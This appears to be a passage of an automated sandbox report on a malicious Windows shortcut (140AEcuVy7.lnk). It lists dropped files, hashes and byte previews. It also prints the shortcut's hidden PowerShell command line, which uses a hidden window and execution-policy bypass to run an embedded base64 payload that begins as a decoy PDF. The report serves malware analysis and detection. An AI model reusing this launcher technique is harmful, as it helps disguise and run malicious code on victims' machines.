                                                                      Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-

                                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\2351a3dc-1c3b-40fd-b656-15c9bdc47dd9.tmp

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                      Category:dropped
                                                                      Size (bytes):1419751
                                                                      Entropy (8bit):7.976496077007677
                                                                      Encrypted:false
                                                                      SSDEEP:24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
                                                                      MD5:18E3D04537AF72FDBEB3760B2D10C80E
                                                                      SHA1:B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
                                                                      SHA-256:BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
                                                                      SHA-512:2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
                                                                      Malicious:false
                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\41d075c6-81f5-4c39-b32d-67347b3fd59c.tmp

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                      Category:dropped
                                                                      Size (bytes):758601
                                                                      Entropy (8bit):7.98639316555857
                                                                      Encrypted:false
                                                                      SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                      MD5:3A49135134665364308390AC398006F1
                                                                      SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                      SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                      SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                      Malicious:false
                                                                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\95c130ec-c7c6-4a79-a977-a793115afd75.tmp

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                      Category:dropped
                                                                      Size (bytes):1407294
                                                                      Entropy (8bit):7.97605879016224
                                                                      Encrypted:false
                                                                      SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                      MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                      SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                      SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                      SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                      Malicious:false
                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\e471c114-2162-4110-b6ef-c1565c55c78e.tmp

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                      Category:dropped
                                                                      Size (bytes):386528
                                                                      Entropy (8bit):7.9736851559892425
                                                                      Encrypted:false
                                                                      SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                      MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                      SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                      SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                      SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                      Malicious:false
                                                                      Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                      C:\Users\user\AppData\Local\Temp\document.pdf

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PDF document, version 1.4, 1 pages
                                                                      Category:dropped
                                                                      Size (bytes):17772
                                                                      Entropy (8bit):7.653670822998931
                                                                      Encrypted:false
                                                                      SSDEEP:192:DVkkw6D71gBGmM2KMDUyoSvKGTzBvOZ9TJJxzIMDxjvK0S9YaAt86zgjIL1rJs9L:DVkkn/WC8KGBshzrvKx6UjMnT62Dk
                                                                      MD5:E762F98EBF5E28324CCC2FA4BA4FC3BB
                                                                      SHA1:EFF5094BB9056A44FE39CCFE4C480CAAD61F8096
                                                                      SHA-256:53812D7BDAF5E8E5C1B99B4B9F3D8D3D7726D4C6C23A72FB109132D96CA725C2
                                                                      SHA-512:2185C0794426D3A430E5F90FD83ECD0BFB00705B6856819B71CF02A94DDA47D63BA798FEC83ABBB1F7883C267EE2976917E13896F3B70B0ABFD262E400AA9060
                                                                      Malicious:false
                                                                      Preview:%PDF-1.4.%......1 0 obj.<< ./Creator (Canon iR-ADV 6555 PDF)./CreationDate (D:20230213085957+01'00')./Producer (\376\377\000A\000d\000o\000b\000e\000 \000P\000S\000L\000 \0001\000.\000\.3\000e\000 \000f\000o\000r\000 \000C\000a\000n\000o\000n\000\000).>> .endobj.2 0 obj.<< ./Pages 3 0 R ./Type /Catalog ./OutputIntents 12 0 R ./Metadata 13 0 R .>> .endobj.4 0 obj.<< /Type /XObject /Subtype /Image /Width 1240 /Height 1753 /BitsPerComponent 8 ./ColorSpace /DeviceGray /Filter [ /FlateDecode /DCTDecode ] /Length 21881 >> .stream..x..=w@S...j..Z..j.[.....hQI....&....n...*HH.u....".........DQD...." ".a..;..,B.._...>...{.9.w.}..1.3....>..!D...n..p.....GQW/&......~...>j.Qcl....dc3i.?.M........../:...{..~ngg........nEuwuC...u:...]...>...~.......G t_%...}>......}.}.Q....|..2>#|.o.......~.....}......7.~4.....k..~?xl..i....E..L\.n..._|...a......ml...n.......N.w.9....Z.d..+|V....q....m.l.s.n.7....y(*........z...a...s./\.r5.Z.....%.w...P..i.......-........W....o.P.:TM.n

                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):98682
                                                                      Entropy (8bit):6.445287254681573
                                                                      Encrypted:false
                                                                      SSDEEP:1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L
                                                                      MD5:7113425405A05E110DC458BBF93F608A
                                                                      SHA1:88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF
                                                                      SHA-256:7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46
                                                                      SHA-512:6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D
                                                                      Malicious:false
                                                                      Preview:0...u0...\...0...*.H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..240807121815Z..240814121815Z0..~.0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...*B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!...in.H...[u...]....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!... .}...|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210

                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):737
                                                                      Entropy (8bit):7.501268097735403
                                                                      Encrypted:false
                                                                      SSDEEP:12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa
                                                                      MD5:5274D23C3AB7C3D5A4F3F86D4249A545
                                                                      SHA1:8A3778F5083169B281B610F2036E79AEA3020192
                                                                      SHA-256:8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97
                                                                      SHA-512:FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574
                                                                      Malicious:false
                                                                      Preview:0...0.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G4..240806194648Z..240827194648Z.00.0...U.#..0.......q]dL..g?....O0...U........0...*.H.............vz..@.Nm...6d...t;.Jx?....6...p...#.[.......o.q...;.........?......o...^p0R*.......~....)....i.*n;A.n.z..O~..%=..s..W.4.+........G...*..=....xen$_i"s..\...L..4../<.4...G.....L...c..k@.J.rC.4h.c.ck./.Q-r53..a#.8#......0.n......a.-'..S. .>..xAKo.k.....;.D>....sb '<..-o.KE...X!i.].c.....o~.q........D...`....N... W:{.3......a@....i....#./..eQ...e.......W.s..V:.38..U.H{.>.....#....?{.....bYAk'b0on..Gb..-..).."q2GO<S.C...FsY!D....x..]4.....X....Y...Rj.....I.96$.4ZQ&..$,hC..H.%..hE....

                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:ISO-8859 text, with very long lines (3486), with CRLF, CR line terminators
                                                                      Category:dropped
                                                                      Size (bytes):14456
                                                                      Entropy (8bit):4.2098179599164975
                                                                      Encrypted:false
                                                                      SSDEEP:192:gcPqYV/saFlwwR+kMqe8TlZMX1sgUVa3ddMVsuNeMcGdSD9obOUAVlcMudM/Y14e:g7Q/X4kMb0lZ6mgtdHOelGdWaolvsTZ
                                                                      MD5:32FCA302C8B872738373D7CCB1E75FD4
                                                                      SHA1:DA85FAF24ED0ECFD5D69CCFD6286D8B77D7EB4F1
                                                                      SHA-256:CD0DD26304B88C20801FE80B33C49C009E2E5D4411B5D7F83252E1D90CD461C6
                                                                      SHA-512:57F8CC85FAFB15455074431216E47433E50DF5DE74ED74C395B7FF2C433DB7CE06F0A1C1FE1EFDC17229DBC33325D559789F43901556DD1A12963B94F01D5A1F
                                                                      Malicious:false
                                                                      Preview:%PPKLITE-2.1.%......1 0 obj.<</PPK<</AddressBook<</Entries[2 0 R 3 0 R 4 0 R 5 0 R 6 0 R]/NextID 1006/Type/AddressBook>>/Type/PPK/User<</Type/User>>/V 65537>>/Type/Catalog>>.endobj.2 0 obj.<</ABEType 1/Cert<308204A130820389A00302010202043E1CBD28300D06092A864886F70D01010505003069310B300906035504061302555331233021060355040A131A41646F62652053797374656D7320496E636F72706F7261746564311D301B060355040B131441646F6265205472757374205365727669636573311630140603550403130D41646F626520526F6F74204341301E170D3033303130383233333732335A170D3233303130393030303732335A3069310B300906035504061302555331233021060355040A131A41646F62652053797374656D7320496E636F72706F7261746564311D301B060355040B131441646F6265205472757374205365727669636573311630140603550403130D41646F626520526F6F7420434130820122300D06092A864886F70D01010105000382010F003082010A0282010100CC4F5484F7A7A2E733537F3F9C12886B2C9947677E0F1EB9AD1488F9C310D81DF0F0D59F690A2F5935B0CC6CA94C9C15A09FCE20BFA0CF54E2E02066453F3986387E9CC48E0722C624F60112B035DF55EA6990B

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\15d362c86149b66f.customDestinations-ms (copy)

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):5377
                                                                      Entropy (8bit):3.4479656277646944
                                                                      Encrypted:false
                                                                      SSDEEP:48:zVfS+VxEEx8dE8Wk5m9wglzQSogZo5E5m9wglIQSogZod1:zwmxsV35m9wg/H55m9wgOHa
                                                                      MD5:BB1FF3DE74731B4D526B0F87824B2C55
                                                                      SHA1:F11DDC9B04DF2CD7F09EA84B145E0DC207FC0CE9
                                                                      SHA-256:5075EF4653ECD0DDA1CEC7F176293F48B076F521080824BF2D0971B646C9FFFA
                                                                      SHA-512:ECC46FD098A44D37CBB4141607E93C1C0D8BB0CB93566DC95B644C4051C981D995AD74E041B94D1F3D36C7A89D1478782E12B2D47E812C8FF74CC084C7B53F52
                                                                      Malicious:false
                                                                      Preview:...................................FL..................F.`.. ...o..m....^q.h>...X..h>...D............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......O.........o....^q.h>.....j.2.D...>Y&m .140AEC~1.LNK..N......DW.r>Y&m..............................1.4.0.A.E.c.u.V.y.7...l.n.k.......U...............-.......T.............I_.....C:\Users\user\Desktop\140AEcuVy7.lnk..3.C.:.\.p.r.o.g.r.a.m. .f.i.l.e.s.\.w.i.n.d.o.w.s. .n.t.\.a.c.c.e.s.s.o.r.i.e.s.\.w.o.r.d.p.a.d...e.x.e.........%ProgramFiles%\windows nt\accessories\wordpad.exe...................................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.w.i.n.d.o.w.s. .n.t.\.a.c.c.e.s.s.o.r.i.e.s.\.w.o.r.d.p.a.d...e.x.e..................................................................................................................................................

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7046Q27TCX0LY0SIK7MW.temp

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):5377
                                                                      Entropy (8bit):3.4479656277646944
                                                                      Encrypted:false
                                                                      SSDEEP:48:zVfS+VxEEx8dE8Wk5m9wglzQSogZo5E5m9wglIQSogZod1:zwmxsV35m9wg/H55m9wgOHa
                                                                      MD5:BB1FF3DE74731B4D526B0F87824B2C55
                                                                      SHA1:F11DDC9B04DF2CD7F09EA84B145E0DC207FC0CE9
                                                                      SHA-256:5075EF4653ECD0DDA1CEC7F176293F48B076F521080824BF2D0971B646C9FFFA
                                                                      SHA-512:ECC46FD098A44D37CBB4141607E93C1C0D8BB0CB93566DC95B644C4051C981D995AD74E041B94D1F3D36C7A89D1478782E12B2D47E812C8FF74CC084C7B53F52
                                                                      Malicious:false
                                                                      Preview:...................................FL..................F.`.. ...o..m....^q.h>...X..h>...D............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......O.........o....^q.h>.....j.2.D...>Y&m .140AEC~1.LNK..N......DW.r>Y&m..............................1.4.0.A.E.c.u.V.y.7...l.n.k.......U...............-.......T.............I_.....C:\Users\user\Desktop\140AEcuVy7.lnk..3.C.:.\.p.r.o.g.r.a.m. .f.i.l.e.s.\.w.i.n.d.o.w.s. .n.t.\.a.c.c.e.s.s.o.r.i.e.s.\.w.o.r.d.p.a.d...e.x.e.........%ProgramFiles%\windows nt\accessories\wordpad.exe...................................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.w.i.n.d.o.w.s. .n.t.\.a.c.c.e.s.s.o.r.i.e.s.\.w.o.r.d.p.a.d...e.x.e..................................................................................................................................................

                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                      Download File
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):55
                                                                      Entropy (8bit):4.306461250274409
                                                                      Encrypted:false
                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                      Malicious:false
                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                      Static File Info

                                                                      General

                                                                      File type:MS Windows shortcut, Item id list present, Has Description string, Has command line arguments, Icon number=0, ctime=Thu Nov 30 07:52:33 2023, mtime=Thu Nov 30 07:52:33 2023, atime=Thu Nov 30 07:52:33 2023, length=0, window=hide
                                                                      Entropy (8bit):5.972732311180514
                                                                      TrID:
                                                                      • Windows Shortcut (20020/1) 100.00%
                                                                      File name:140AEcuVy7.lnk
                                                                      File size:25'631 bytes
                                                                      MD5:64752d058e5829210a0f407fb912c9d3
                                                                      SHA1:4e8a0cfb784a6f93f8974b4f11679786cef86bb7
                                                                      SHA256:0aa794e54c19dbcd5425405e3678ab9bc98fb7ea787684afb962ee22a1c0ab51
                                                                      SHA512:a383cfcaf25dababb76273ec0802867e1e74d2bcf4640eee855714b4c7c74e61145c6510668327dee053d904ed9d5cb4c5bfc3a8149f992ffdcb2cc7a96f1904
                                                                      SSDEEP:768:dPeFfZZEwj8l3fLSjDcljohJ8AtHMDjr4LunAX:dPUX8l2aFA1MDjrPU
                                                                      TLSH:5BB2CF9BFC923D5CF3D84EB722A7EC022AA43C2F15874560E645719948903BE3DB4D2E
                                                                      File Content Preview:L..................Fe...........j#......j#......j#...............................P.O. .:i.....+00.../C:\.....................2..:..HG.-..windows\system32\WindowsPowershell\v1.0\powershell.exe..........HG.-.KMI....w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.W.i.n.d.

                                                                      File Icon

                                                                      Icon Hash:dce4d4c4ccc9c96d

                                                                      Static Windows Shortcut Info

                                                                      General

                                                                      Relative Path:
                                                                      Command Line Argument:-w hidden -nop -noni -exec bypass -c $temp='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